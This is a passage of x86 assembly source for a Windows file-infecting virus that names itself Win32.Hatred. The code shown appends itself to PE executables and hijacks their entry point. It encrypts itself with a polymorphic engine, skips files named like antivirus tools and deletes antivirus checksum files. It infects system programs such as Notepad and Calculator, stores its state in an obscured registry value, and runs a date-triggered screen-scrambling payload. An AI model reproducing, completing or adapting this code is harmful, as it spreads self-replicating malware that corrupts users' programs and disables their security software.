|
||
add eax, virussize+500h ;
|
||
push eax ; map the file!!
|
||
push 0 ;
|
||
push 0 ;
|
||
push 2 ;
|
||
mov eax, [ebp+maphandle] ;
|
||
push eax; ;
|
||
call [ebp+_MapViewOfFile] ;
|
||
;
|
||
cmp eax, 0 ;
|
||
je close_map ;
|
||
;
|
||
mov esi, eax ;
|
||
mov [ebp+mapaddress], esi ; save map address
|
||
;
|
||
cmp word ptr [esi], 'ZM' ; is it a MZ EXE file?
|
||
jne unmap_view ;
|
||
mov esi, dword ptr [esi.MZ_lfanew] ; get PE header offset
|
||
cmp esi, 1000h ; too far?
|
||
ja unmap_view ;
|
||
add esi, [ebp+mapaddress] ; save map address
|
||
cmp word ptr [esi], 'EP' ; is it a PE file?
|
||
jne unmap_view ;
|
||
;
|
||
mov dword ptr [ebp+PEheader], esi ; save PE header place
|
||
add esi, IMAGE_FILE_HEADER_SIZE ; go to Optional header
|
||
;
|
||
cmp word ptr [esi.OH_Win32VersionValue], 'H8' ; already infected?
|
||
je unmap_view ;
|
||
;
|
||
call InfectFile ; infect, please!
|
||
jc don_t_mark ;
|
||
;
|
||
dec [ebp+files] ; decrease infected files
|
||
;
|
||
mov word ptr [esi.OH_Win32VersionValue], 'H8' ; mark infection
|
||
;
|
||
don_t_mark: ;
|
||
unmap_view: ;
|
||
mov eax, [ebp+mapaddress] ;
|
||
push eax ; unmap the view
|
||
call [ebp+_UnmapViewOfFile] ;
|
||
;
|
||
close_map: ;
|
||
mov eax, [ebp+maphandle] ;
|
||
push eax ; close the map
|
||
call [ebp+_CloseHandle] ;
|
||
;
|
||
close_file: ;
|
||
push 0 ; first we must set the file
|
||
push 0 ; pointer at the end of file
|
||
push dword ptr [ebp+offset filesize];
|
||
push dword ptr [ebp+offset handle1];
|
||
call [ebp+_SetFilePointer] ;
|
||
;
|
||
push dword ptr [ebp+offset handle1]; ...and then mark the end of
|
||
call [ebp+_SetEndOfFile] ; file...
|
||
;
|
||
lea ebx, [ebp+offset FileTime] ; restore the file time
|
||
push ebx ;
|
||
add ebx, 8 ;
|
||
push ebx ;
|
||
add ebx, 8 ;
|
||
push ebx ;
|
||
push dword ptr [ebp+offset handle1];
|
||
call dword ptr [ebp+_SetFileTime] ;
|
||
;
|
||
mov eax, [ebp+handle1] ;
|
||
push eax ; close the file...
|
||
call [ebp+_CloseHandle] ;
|
||
;
|
||
push dword ptr [ebp+offset fileattributes] ; restore the file attribs
|
||
push dword ptr [ebp+offset fileofs];
|
||
call [ebp+_SetFileAttributes] ;
|
||
;
|
||
next_file_exit: ;
|
||
popad ; restore registers and exit
|
||
ret ;
|
||
OpenFile endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Infect opened file ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: ESI = pointer to the file map
|
||
|
||
InfectFile proc near
|
||
pushad ;
|
||
mov eax, dword ptr [esi.OH_FileAlignment] ; save all the needed
|
||
mov dword ptr [ebp+filealign], eax ; values
|
||
mov eax, dword ptr [esi.OH_SectionAlignment] ;
|
||
mov dword ptr [ebp+sectionalign], eax ;
|
||
mov eax, dword ptr [esi.OH_AddressOfEntryPoint];
|
||
mov dword ptr [ebp+oldeip], eax ;
|
||
mov eax, dword ptr [esi.OH_ImageBase] ;
|
||
mov dword ptr [ebp+newimagebase], eax ;
|
||
;
|
||
mov ebx, dword ptr [esi.OH_NumberOfRvaAndSizes]; let us locate the
|
||
shl ebx, 3 ; last section
|
||
xor eax, eax ;
|
||
mov ax, word ptr [esi.NumberOfSections-IMAGE_FILE_HEADER_SIZE]
|
||
dec eax ;
|
||
mov ecx, IMAGE_SECTION_HEADER_SIZE ;
|
||
mul ecx ;
|
||
;
|
||
mov esi, dword ptr [ebp+PEheader] ; PE header offset +
|
||
add esi, IMAGE_FILE_HEADER_SIZE ; header length +
|
||
add esi, 60h ; optional header len +
|
||
add esi, ebx ; + data directory
|
||
add esi, eax ; + all sections
|
||
;
|
||
mov [ebp+lastsection], esi ; save last section addr
|
||
mov edi, dword ptr [esi.SH_PointerToRawData] ; get pointer to raw data
|
||
add edi, dword ptr [ebp+mapaddress] ; and align it to memory
|
||
add edi, dword ptr [esi.SH_VirtualSize] ; and then add virtual
|
||
mov [ebp+smth], edi ; size and save the value
|
||
;
|
||
pushad ; let us copy our virus
|
||
lea esi, dword ptr [ebp+start] ; there...
|
||
mov ecx, virussize ;
|
||
rep movsb ;
|
||
popad ;
|
||
;
|
||
add dword ptr [esi.SH_VirtualSize], virussize ; increase the sizes
|
||
add dword ptr [esi.SH_SizeOfRawData], virussize; (virtual and physical)
|
||
or dword ptr [esi.SH_Characteristics], 0C0000040h; make section R/W
|
||
;
|
||
mov eax, [esi.SH_SizeOfRawData] ; align SizeOfRawData
|
||
mov ecx, dword ptr [ebp+filealign] ; to the file
|
||
push eax ; alignment
|
||
push ecx ;
|
||
xor edx, edx ;
|
||
div ecx ;
|
||
pop ecx ;
|
||
sub ecx, edx ;
|
||
pop eax ;
|
||
add eax, ecx ;
|
||
mov dword ptr [esi.SH_SizeOfRawData], eax ; and store it
|
||
;
|
||
mov esi, dword ptr [ebp+PEheader] ;
|
||
mov eax, dword ptr [esi+50h] ; Get OldSizeOfImage
|
||
add eax, virussize ; increase it and then
|
||
mov ecx, dword ptr [ebp+sectionalign] ; align it to the section
|
||
push eax ; alignment
|
||
push ecx ;
|
||
xor edx, edx ;
|
||
div ecx ;
|
||
pop ecx ;
|
||
sub ecx, edx ;
|
||
pop eax ;
|
||
add eax, ecx ;
|
||
mov dword ptr [esi+50h], eax ;
|
||
;
|
||
mov edi, [ebp+lastsection] ; point last section
|
||
;
|
||
mov eax, [edi.SH_PointerToRawData] ; Pointer to raw data
|
||
add eax, [edi.SH_VirtualSize] ; plus last section size
|
||
mov [ebp+filesize], eax ; is the filesize. Align
|
||
mov ecx, dword ptr [ebp+filealign] ; it to the file
|
||
push eax ; alignment
|
||
push ecx ;
|
||
xor edx, edx ;
|
||
div ecx ;
|
||
pop ecx ;
|
||
sub ecx, edx ;
|
||
pop eax ;
|
||
add eax, ecx ;
|
||
mov dword ptr [ebp+filesize], eax ; and store it
|
||
;
|
||
mov eax, [edi.SH_VirtualAddress] ; let us locate the new
|
||
add eax, [edi.SH_VirtualSize] ; EIP...
|
||
sub eax, virussize ;
|
||
mov dword ptr [esi+28h], eax ; ...and store it!!
|
||
|
||
; we finished infecting the file. Now let us prepare to call the poly
|
||
; engine:
|
||
|
||
mov ebx, eax ; EBX = code to decrypt at
|
||
add ebx, [ebp+imagebase] ; runtime
|
||
add ebx, offset start_of_code-offset start ; (adjustment)
|
||
mov esi, dword ptr [ebp+smth] ; ESI = code to encrypt in
|
||
add esi, offset start_of_code-offset start ; memory
|
||
mov edi, esi ; EDI = where to place the
|
||
add edi, offset decrypt-offset start_of_code; decryptor
|
||
mov ecx, end_of_code-start_of_code ; ECX = size of code to crypt
|
||
shr ecx, 2 ; be sure is divisible by
|
||
shl ecx, 2 ; 4
|
||
;
|
||
Call MOF32 ; Call MOF32
|
||
;
|
||
mov edi, [ebp+the_end] ; go to the end
|
||
sub esi, edi ; and store a JMP there...
|
||
mov al, 0E9h ;
|
||
stosb ;
|
||
mov eax, esi ; a jmp to the beginning of
|
||
sub eax, 5 ; the real code
|
||
stosd ;
|
||
;
|
||
mov ecx, dword ptr [ebp+offset filesize] ; put zeroes until the end
|
||
add ecx, [ebp+mapaddress] ; of file so no mess is
|
||
sub ecx, edi ; found there (the mess
|
||
mov edi, [ebp+end_end] ;
|
||
mov al, 0 ; which remains is because
|
||
rep stosb ; of the alignment)
|
||
popad ; restore registers
|
||
;
|
||
mov edi, dword ptr [ebp+smth] ; mutate initial jump
|
||
add edi, offset jump_code-offset start ;
|
||
mov eax, dword ptr [ebp+first_intend] ; with the first intend
|
||
add dword ptr [edi+1], eax ;
|
||
ret ;
|
||
InfectFile endp ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Check if the file is good for infection ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: = pointer to filename
|
||
;
|
||
; Return: CF clear if file is ok
|
||
; CF set if file cannot be infected
|
||
|
||
|
||
ValidateFile proc near ;
|
||
pushad ;
|
||
;
|
||
xchg esi, edi ;
|
||
lea esi, [ebp+avoid_list] ; point avoid list
|
||
;
|
||
repeat_check_files: ;
|
||
push esi ;
|
||
call [ebp+_lstrlen] ; get length of string
|
||
mov ecx, eax ;
|
||
;
|
||
push esi edi ;
|
||
rep cmpsb ; compare string
|
||
je file_invalid ;
|
||
pop edi esi ;
|
||
add esi, eax ; go to the next name
|
||
inc esi ;
|
||
cmp byte ptr [esi], 0FFh ; the end?
|
||
je file_valid ;
|
||
jmp repeat_check_files ;
|
||
;
|
||
file_valid: ;
|
||
clc ; file can be infected
|
||
popad ;
|
||
ret ;
|
||
;
|
||
file_invalid: ;
|
||
pop edi ecx ;
|
||
stc ; file cannot be infected
|
||
popad ;
|
||
ret ;
|
||
ValidateFile endp ;
|
||
;
|
||
avoid_list label ;
|
||
db 'TB' ,0 ;
|
||
db 'F-' ,0 ;
|
||
db 'AW' ,0 ;
|
||
db 'AV' ,0 ;
|
||
db 'NAV' ,0 ;
|
||
db 'PAV' ,0 ;
|
||
db 'RAV' ,0 ;
|
||
db 'NVC' ,0 ;
|
||
db 'FPR' ,0 ;
|
||
db 'DSS' ,0 ;
|
||
db 'IBM' ,0 ;
|
||
db 'INOC' ,0 ;
|
||
db 'ANTI' ,0 ;
|
||
db 'SCN' ,0 ;
|
||
db 'VSAF' ,0 ;
|
||
db 'VSWP' ,0 ;
|
||
db 'PANDA' ,0 ;
|
||
db 'DRWEB' ,0 ;
|
||
db 'FSAV' ,0 ;
|
||
db 0FFh ;
|
||
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Retrieve or set the last checked directory from the registry ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;
|
||
; Entry: nothing
|
||
;
|
||
; Return: EDI = pointer to the directory
|
||
|
||
SetInitialKey proc near ;
|
||
pushad ;
|
||
;
|
||
lea eax, dword ptr [ebp+offset key_handle] ; First let us open
|
||
push eax ; the key we have
|
||
push KEY_ALL_ACCESS ; our value set up in
|
||
push 0 ;
|
||
lea eax, dword ptr [ebp+offset KEY] ;
|
||
push eax ;
|
||
push HKEY_CURRENT_USER ;
|
||
call [ebp+_RegOpenKeyExA] ;
|
||
cmp eax, 0 ;
|
||
jne set_new_key ; if error -> create...
|
||
;
|
||
lea eax, dword ptr [ebp+offset key_len] ; now, after the key is
|
||
push eax ; open, lets query our
|
||
lea eax, dword ptr [ebp+offset key_data] ; Hatred value...
|
||
push eax ;
|
||
lea eax, dword ptr [ebp+offset key_type] ;
|
||
push eax ;
|
||
push 0 ;
|
||
lea eax, dword ptr [ebp+key_name] ;
|
||
push eax ;
|
||
mov eax, dword ptr [ebp+key_handle] ;
|
||
push eax ;
|
||
call [ebp+_RegQueryValueExA] ;
|
||
cmp eax, 0 ; if found, then it's ok
|
||
je key_was_found ;
|
||
;
|
||
mov eax, dword ptr [ebp+key_handle] ; close key handle
|
||
push eax ; (carefull!)
|
||
call [ebp+_CloseHandle] ;
|
||
;
|
||
set_new_key: ; otherwise create key/val
|
||
IF TESTONLY ; if we must set a new
|
||
ELSE ; key then we should make
|
||
call DirectInfect ; the direct infection
|
||
ENDIF ; now...
|
||
mov [ebp+skip], 1 ;
|
||
lea eax, dword ptr [ebp+disposition] ; new? or existing?
|
||
push eax ;
|
||
lea eax, dword ptr [ebp+key_handle] ; new key handle
|
||
push eax ;
|
||
push 0 ; security attrib
|
||
push KEY_ALL_ACCESS ; all access
|
||
push REG_OPTION_NONVOLATILE ; don't destroy at reboot
|
||
push 0 ; class
|
||
push 0 ; reserved
|
||
lea eax, dword ptr [ebp+KEY] ; ptr to new key name
|
||
push eax ;
|
||
push HKEY_CURRENT_USER ; parent key
|
||
call [ebp+_RegCreateKeyExA] ;
|
||
;
|
||
push 4 ; new value length
|
||
lea eax, dword ptr [ebp+system_paths] ; new value pointer
|
||
call CryptKey ;
|
||
;
|
||
subsequent_call: ;
|
||
push eax ;
|
||
push REG_SZ ; make it string
|
||
push 0 ; reserved
|
||
lea eax, dword ptr [ebp+key_name] ; key name for value
|
||
push eax ;
|
||
mov eax, dword ptr [ebp+key_handle] ;
|
||
push eax ; new key handle
|
||
call [ebp+_RegSetValueExA] ;
|
||
lea edi, dword ptr [ebp+system_paths] ;
|
||
mov eax, edi ;
|
||
call CryptKey ;
|
||
jmp exit_registry ;
|
||
;
|
||
key_was_found: ;
|
||
mov [ebp+skip], 0 ;
|
||
lea edi, dword ptr [ebp+key_data] ;
|
||
mov eax, edi ;
|
||
call CryptKey ; decrypt key
|
||
push edi ; is the found key
|
||
call [ebp+_SetCurrentDirectoryA] ; still a valid dir?
|
||
or eax, eax ;
|
||
jz set_new_key ; if not reset...
|
||
;
|
||
exit_registry: ;
|
||
mov eax, dword ptr [ebp+key_handle] ; close this handle too
|
||
push eax ;
|
||
call dword ptr [ebp+_CloseHandle] ;
|
||
mov dr0, edi ;
|
||
popad ;
|
||
mov edi, dr0 ; and return with edi
|
||
ret ; pointing the path
|
||
SetInitialKey endp ;
|
||
;
|
||
SetSubsequentKey proc near ;
|
||
pushad ;
|
||
lea eax, [ebp+offset key_data] ;
|
||
push eax ;
|
||
push 260 ;
|
||
call [ebp+_GetCurrentDirectoryA] ; retrieve last checked
|
||
lea eax, [ebp+offset key_data] ; dir
|
||
call CryptKey ; crypt it
|
||
push 4 ;
|
||
lea eax, [ebp+offset key_data] ; and set it in the
|
||
jmp subsequent_call ; registry
|
||
SetSubsequentKey endp ;
|
||
;
|
||
CryptKey proc near ; eax = address ; this crypts or decrypts
|
||
push eax ecx ; the key with a simple
|
||
push eax ; XOR algorithm. However
|
||
push eax ; using RegEdit you cannot
|
||
call [ebp+_lstrlen] ; see the encrypted key.
|
||
mov ecx, eax ; Instead a bunch of
|
||
pop eax ; black squares will
|
||
crypt_key: ; appear as our key's
|
||
xor byte ptr [eax], 'H' ; value.
|
||
inc eax ;
|
||
loop crypt_key ;
|
||
pop ecx eax ;
|
||
ret ;
|
||
CryptKey endp ;
|
||
;
|
||
HKEY_CURRENT_USER EQU 80000001h ; Where to create key
|
||
REG_SZ EQU 1 ; Create String values
|
||
REG_OPTION_NONVOLATILE EQU 0 ; Do not destroy at reboot
|
||
KEY_ALL_ACCESS EQU 0F003FH ; all access
|
||
disposition dd 0 ; ...
|
||
key_handle dd 0 ; values ret. by Create
|
||
KEY db "Control Panel\Cursors", 0 ; new key
|
||
key_data db 260 dup(0) ; new value
|
||
key_len dd 260 ;
|
||
key_name db "dertaH", 0 ; key name
|
||
key_type dd 0 ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Graphical Payload ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
Payload proc near
|
||
lea eax, [ebp+offset systime] ; get the system time
|
||
mov edi, eax ;
|
||
push eax ;
|
||
call [ebp+_GetSystemTime] ;
|
||
mov eax, dword ptr [edi+4] ;
|
||
and eax, 0FFFF0000h ;
|
||
shr eax, 10h ; Eax = Day of Month...
|
||
cmp eax, 7 ; is it 7 ?
|
||
jne no_payload ;
|
||
;
|
||
push 1000h ; display a window
|
||
lea eax, [ebp+wintitle] ;
|
||
push eax ;
|
||
lea eax, [ebp+wintext] ;
|
||
push eax ;
|
||
push 0 ;
|
||
call [ebp+_MessageBoxA] ;
|
||
;
|
||
xor eax, eax ; get screen device context
|
||
push eax ;
|
||
call [ebp+_GetDC] ;
|
||
mov [ebp+screen], eax ;
|
||
;
|
||
loop_: ;
|
||
mov eax, 2000 ; get a random X-axis place
|
||
call brandom32 ;
|
||
mov [ebp+x], eax ;
|
||
mov eax, 2000 ; get a random Y-axis place
|
||
call brandom32 ;
|
||
mov [ebp+y], eax ;
|
||
push 0 ; erase area flag
|
||
push [ebp+x] ;
|
||
push [ebp+y] ;
|
||
push [ebp+screen] ;
|
||
push 1 ; area size
|
||
push 1 ; area size
|
||
inc [ebp+x] ;
|
||
inc [ebp+y] ;
|
||
push [ebp+x] ;
|
||
push [ebp+y] ;
|
||
push [ebp+screen] ;
|
||
call [ebp+_BitBlt] ; do it...
|
||
;
|
||
push 01bh ; check if ESC was pressed...
|
||
call [ebp+_GetAsyncKeyState] ;
|
||
or eax, eax ;
|
||
jne finish ;
|
||
jmp loop_ ;
|
||
;
|
||
finish: ;
|
||
no_payload: ;
|
||
ret ;
|
||
|
||
wintitle db "Win32.Hatred by Lord Julus (c) 1999", 0
|
||
wintext db 13, 10, 13, 10
|
||
db "Today is the 7th !! Today is the day of hate !!"
|
||
db 13, 10, 13, 10
|
||
db "With Heart feel Hatred ! Black blood runs thru my veins !"
|
||
db 13, 10, 13, 10
|
||
db "Hatred !!!! Hatred !!!!"
|
||
db 13, 10, 13, 10
|
||
db "(escape is your escape)"
|
||
db 13, 10, 0
|
||
x dd 0
|
||
y dd 0
|
||
screen dd 0
|
||
systime dd 0
|
||
Payload endp
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Erase Checksum Files ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
EraseChecksums proc near ;
|
||
pushad ;
|
||
lea edi, [ebp+offset searchfiles] ; point to Search Record
|
||
lea esi, [ebp+offset av_list] ; point av files list
|
||
;
|
||
locate_next_av: ;
|
||
cmp byte ptr [esi], 0FFh ;
|
||
je av_kill_done ;
|
||
mov eax, esi ;
|
||
cmp byte ptr [eax], 0FFh ; is this the end?
|
||
je av_kill_done ;
|
||
push edi ; push search record address
|
||
push eax ; push filename address
|
||
call [ebp+_FindFirstFileA] ; find first match
|
||
cmp eax, 0FFFFFFFFh ; check for EAX = -1
|
||
je next_av_file ;
|
||
push eax ;
|
||
lea ebx, [edi.FileName] ; ESI = pointer to filename...
|
||
push ebx ; push filename address
|
||
call [ebp+_DeleteFileA] ; delete file!
|
||
;
|
||
call [ebp+_FindClose] ; close the find handle
|
||
;
|
||
next_av_file: ;
|
||
push edi ;
|
||
mov edi, esi ;
|
||
mov al, 0 ;
|
||
mov ecx, 100 ;
|
||
repnz scasb ;
|
||
mov esi, edi ;
|
||
pop edi ;
|
||
jmp locate_next_av ;
|
||
;
|
||
av_kill_done: ;
|
||
popad ;
|
||
ret ;
|
||
EraseChecksums endp ;
|
||
;
|
||
av_list db "AVP.CRC" , 0 ; the av files to kill
|
||
db "IVP.NTZ" , 0 ;
|
||
db "Anti-Vir.DAT", 0 ;
|
||
db "CHKList.MS" , 0 ;
|
||
db "CHKList.CPS" , 0 ;
|
||
db "SmartCHK.MS" , 0 ;
|
||
db "SmartCHK.CPS", 0 ;
|
||
db 0FFh ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Direct Infect Routine ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
DirectInfect proc near ; direct ass-kick
|
||
pushad ;
|
||
;
|
||
lea esi, [ebp+tempdir] ;
|
||
push 260 ;
|
||
push esi ;
|
||
call [ebp+_GetWindowsDirectoryA] ; find Windows dir
|
||
;
|
||
or eax, eax ;
|
||
jz quit ;
|
||
;
|
||
push esi ;
|
||
call [ebp+_SetCurrentDirectoryA] ; change to it...
|
||
;
|
||
lea esi, [ebp+direct_list] ; take the files...
|
||
;
|
||
direct_loop: ;
|
||
call OpenFile ; open & infect
|
||
mov edi, esi ;
|
||
mov al, 0 ;
|
||
mov ecx, 100 ;
|
||
repnz scasb ; next file
|
||
cmp byte ptr [edi], 0FFh ;
|
||
je quit ;
|
||
mov esi, edi ;
|
||
jmp direct_loop ;
|
||
;
|
||
quit: ;
|
||
popad ;
|
||
ret ;
|
||
DirectInfect endp ;
|
||
;
|
||
IF DEBUG ;
|
||
direct_list label ;
|
||
db 'CDPLAYER.XEX', 0 ;
|
||
db 'CALC.XEX' , 0 ;
|
||
db 'PBRUSH.XEX' , 0 ;
|
||
db 'MPLAYER.XEX' , 0 ;
|
||
db 'NOTEPAD.XEX' , 0 ;
|
||
db 'WINHLP32.XEX', 0 ;
|
||
db 0FFh ;
|
||
ELSE ;
|
||
direct_list label ;
|
||
db 'CDPLAYER.EXE', 0 ;
|
||
db 'CALC.EXE' , 0 ;
|
||
db 'PBRUSH.EXE' , 0 ;
|
||
db 'MPLAYER.EXE' , 0 ;
|
||
db 'NOTEPAD.EXE' , 0 ;
|
||
db 'WINHLP32.EXE', 0 ;
|
||
db 0FFh ;
|
||
ENDIF ;
|
||
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
;? Equates, structures, data ?
|
||
;??????????????????????????????????????????????????????????????????????????
|
||
|
||
IMAGE_DOS_HEADER STRUC ; DOS .EXE header
|
||
MZ_magic DW ? ; Magic number
|
||
MZ_cblp DW ? ; Bytes on last page of file
|
||
MZ_cp DW ? ; Pages in file
|
||
MZ_crlc DW ? ; Relocations
|
||
MZ_cparhdr DW ? ; Size of header in paragraphs
|
||
MZ_minalloc DW ? ; Minimum extra paragraphs needed
|
||
MZ_maxalloc DW ? ; Maximum extra paragraphs needed
|
||
MZ_ss DW ? ; Initial (relative) SS value
|
||
MZ_sp DW ? ; Initial SP value
|
||
MZ_csum DW ? ; Checksum
|
||
MZ_ip DW ? ; Initial IP value
|
||
MZ_cs DW ? ; Initial (relative) CS value
|
||
MZ_lfarlc DW ? ; File address of relocation table
|
||
MZ_ovno DW ? ; Overlay number
|
||
MZ_res DW 4 DUP(?) ; Reserved words
|
||
MZ_oemid DW ? ; OEM identifier (for MZ_oeminfo)
|
||
MZ_oeminfo DW ? ; OEM information; MZ_oemid specific
|
||
MZ_res2 DW 10 DUP(?) ; Reserved words
|
||
MZ_lfanew DD ? ; File address of new exe header
|
||
IMAGE_DOS_HEADER ENDS ;
|
||
IMAGE_DOS_HEADER_SIZE = SIZE IMAGE_DOS_HEADER
|
||
;
|
||
IMAGE_FILE_HEADER STRUC ; Portable Exe File
|
||
PE_Magic DD ? ;
|
||
Machine DW ? ; Machine type
|
||
NumberOfSections DW ? ; Number of sections
|
||
TimeDateStamp DD ? ; Date and Time
|
||
PointerToSymbolTable DD ? ; Pointer to Symbols
|
||
NumberOfSymbols DD ? ; Number of Symbols
|
||
SizeOfOptionalHeader DW ? ; Size of Optional Header
|
||
Characteristics DW ? ; File characteristics
|
||
IMAGE_FILE_HEADER ENDS ;
|
||
IMAGE_FILE_HEADER_SIZE = SIZE IMAGE_FILE_HEADER
|
||
;
|
||
IMAGE_DATA_DIRECTORY STRUC ; Image data directory
|
||
DD_VirtualAddress DD ? ; Virtual address
|
||
DD_Size DD ? ; Virtual size
|
||
IMAGE_DATA_DIRECTORY ENDS ;;;;;;;;;
|
||
;
|
||
IMAGE_DIRECTORY_ENTRIES STRUC ; All directories
|
||
DE_Export IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Import IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Resource IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Exception IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Security IMAGE_DATA_DIRECTORY ? ;
|
||
DE_BaseReloc IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Debug IMAGE_DATA_DIRECTORY ? ;
|
||
DE_Copyright IMAGE_DATA_DIRECTORY ? ;
|
||
DE_GlobalPtr IMAGE_DATA_DIRECTORY ? ;
|
||
DE_TLS IMAGE_DATA_DIRECTORY ? ;
|
||
DE_LoadConfig IMAGE_DATA_DIRECTORY ? ;
|
||
DE_BoundImport IMAGE_DATA_DIRECTORY ? ;
|
||
DE_IAT IMAGE_DATA_DIRECTORY ? ;
|
||
IMAGE_DIRECTORY_ENTRIES ENDS ;
|
||
IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 ;
|
||
;;;;;;;;;;;
|
||
IMAGE_OPTIONAL_HEADER STRUC ; Optional Header
|
||
OH_Magic DW ? ; Magic word
|
||
OH_MajorLinkerVersion DB ? ; Major Linker version
|
||
OH_MinorLinkerVersion DB ? ; Minor Linker version
|
||
OH_SizeOfCode DD ? ; Size of code section
|
||
OH_SizeOfInitializedData DD ? ; Initialized Data
|
||
OH_SizeOfUninitializedData DD ? ; Uninitialized Data
|
||
OH_AddressOfEntryPoint DD BYTE PTR ? ; Initial EIP
|
||
OH_BaseOfCode DD BYTE PTR ? ; Code Virtual Address
|
||
OH_BaseOfData DD BYTE PTR ? ; Data Virtual Address
|
||
OH_ImageBase DD BYTE PTR ? ; Base of image
|
||
OH_SectionAlignment DD ? ; Section Alignment
|
||
OH_FileAlignment DD ? ; File Alignment
|
||
OH_MajorOperatingSystemVersion DW ? ; Major OS
|
||
OH_MinorOperatingSystemVersion DW ? ; Minor OS
|
||
OH_MajorImageVersion DW ? ; Major Image version
|
||
OH_MinorImageVersion DW ? ; Minor Image version
|
||
OH_MajorSubsystemVersion DW ? ; Major Subsys version
|
||
OH_MinorSubsystemVersion DW ? ; Minor Subsys version
|
||
OH_Win32VersionValue DD ? ; win32 version
|
||
OH_SizeOfImage DD ? ; Size of image
|
||
OH_SizeOfHeaders DD ? ; Size of Header
|
||
OH_CheckSum DD ? ; unused
|
||
OH_Subsystem DW ? ; Subsystem
|
||
OH_DllCharacteristics DW ? ; DLL characteristic
|
||
OH_SizeOfStackReserve DD ? ; Stack reserve
|
||
OH_SizeOfStackCommit DD ? ; Stack commit
|
||
OH_SizeOfHeapReserve DD ? ; Heap reserve
|
||
OH_SizeOfHeapCommit DD ? ; Heap commit
|
||
OH_LoaderFlags DD ? ; Loader flags
|
||
OH_NumberOfRvaAndSizes DD ? ; Number of directories
|
||
UNION ; directory entries
|
||
OH_DataDirectory IMAGE_DATA_DIRECTORY\
|
||
IMAGE_NUMBEROF_DIRECTORY_ENTRIES DUP (?)
|
||
OH_DirectoryEntries IMAGE_DIRECTORY_ENTRIES ?
|
||
ENDS ;
|
||
IMAGE_OPTIONAL_HEADER ENDS ;
|
||
IMAGE_OPTIONAL_HEADER_SIZE = SIZE IMAGE_OPTIONAL_HEADER
|
||
;
|
||
IMAGE_SECTION_HEADER STRUC ; Section hdr.
|
||
SH_Name DB 8 DUP(?) ; name
|
||
UNION ;
|
||
SH_PhysicalAddress DD BYTE PTR ? ; Physical address
|
||
SH_VirtualSize DD ? ; Virtual size
|
||
ENDS ;
|
||
SH_VirtualAddress DD BYTE PTR ? ; Virtual address
|
||
SH_SizeOfRawData DD ? ; Raw data size
|
||
SH_PointerToRawData DD BYTE PTR ? ; pointer to raw data
|
||
SH_PointerToRelocations DD BYTE PTR ? ; ...
|
||
SH_PointerToLinenumbers DD BYTE PTR ? ; ...... not really used
|
||
SH_NumberOfRelocations DW ? ; ....
|
||
SH_NumberOfLinenumbers DW ? ; ..
|
||
SH_Characteristics DD ? ; flags
|
||
IMAGE_SECTION_HEADER ENDS ;
|
||
IMAGE_SECTION_HEADER_SIZE = SIZE IMAGE_SECTION_HEADER
|
||
;
|
||
IMAGE_IMPORT_BY_NAME STRUC ; Import by name data type
|
||
IBN_Hint DW 0 ; Hint entry
|
||
IBN_Name DB 1 DUP (?) ; name
|
||
IMAGE_IMPORT_BY_NAME ENDS ;
|
||
;
|
||
IMAGE_THUNK_DATA STRUC ; Thunk data
|
||
UNION ;
|
||
TD_AddressOfData DD IMAGE_IMPORT_BY_NAME PTR ? ; Ptr to IMAGE_IMPORT_BY_NAME structure
|
||
TD_Ordinal DD ? ; Ordinal ORed with IMAGE_ORDINAL_FLAG
|
||
TD_Function DD BYTE PTR ? ; Ptr to function (i.e. Function address after program load)
|
||
TD_ForwarderString DD BYTE PTR ? ; Ptr to a forwarded API function.
|
||
ENDS ;
|
||
IMAGE_THUNK_DATA ENDS ;;;;;;;;;
|
||
;
|
||
IMAGE_IMPORT_DESCRIPTOR STRUC ; Import descryptor
|
||
UNION ;
|
||
ID_Characteristics DD ? ; 0 for last null import descriptor
|
||
ID_OriginalFirstThunk DD IMAGE_THUNK_DATA PTR ? ; RVA to original unbound IAT
|
||
ENDS ;
|
||
ID_TimeDateStamp DD ? ;
|
||
ID_ForwarderChain DD ? ; -1 if no forwarders
|
||
ID_Name DD BYTE PTR ? ; RVA to name of imported DLL
|
||
ID_FirstThunk DD IMAGE_THUNK_DATA PTR ? ; RVA to IAT
|
||
IMAGE_IMPORT_DESCRIPTOR ENDS ;
|
||
IMAGE_IMPORT_DESCRIPTOR_SIZE = SIZE IMAGE_IMPORT_DESCRIPTOR
|
||
|
||
IMAGE_EXPORT_DIRECTORY STRUC ; Export Directory type
|
||
ED_Characteristics DD ? ; Flags
|
||
ED_TimeDateStamp DD ? ; Date / Time
|
||
ED_MajorVersion DW ? ; Major version
|
||
ED_MinorVersion DW ? ; Minor version
|
||
ED_Name DD BYTE PTR ? ; Ptr to name of exported DLL
|
||
UNION ;
|
||
ED_Base DD ? ; base
|
||
ED_BaseOrdinal DD ? ; base ordinal
|
||
ENDS ;
|
||
ED_NumberOfFunctions DD ? ; number of exported funcs.
|
||
UNION ;
|
||
ED_NumberOfNames DD ? ; number of exported names
|
||
ED_NumberOfOrdinals DD ? ; number of exported ordinals
|
||
ENDS ;
|
||
ED_AddressOfFunctions DD DWORD PTR ? ; Ptr to array of function addresses
|
||
ED_AddressOfNames DD DWORD PTR ? ; Ptr to array of (function) name addresses
|
||
UNION ;
|
||
ED_AddressOfNameOrdinals DD WORD PTR ? ; Ptr to array of name ordinals
|
||
ED_AddressOfOrdinals DD WORD PTR ? ; Ptr to array of ordinals
|
||
ENDS ;
|
||
IMAGE_EXPORT_DIRECTORY ENDS ;
|
||
|
||
filetime STRUC ; filetime structure
|
||
FT_dwLowDateTime dd ? ;
|
||
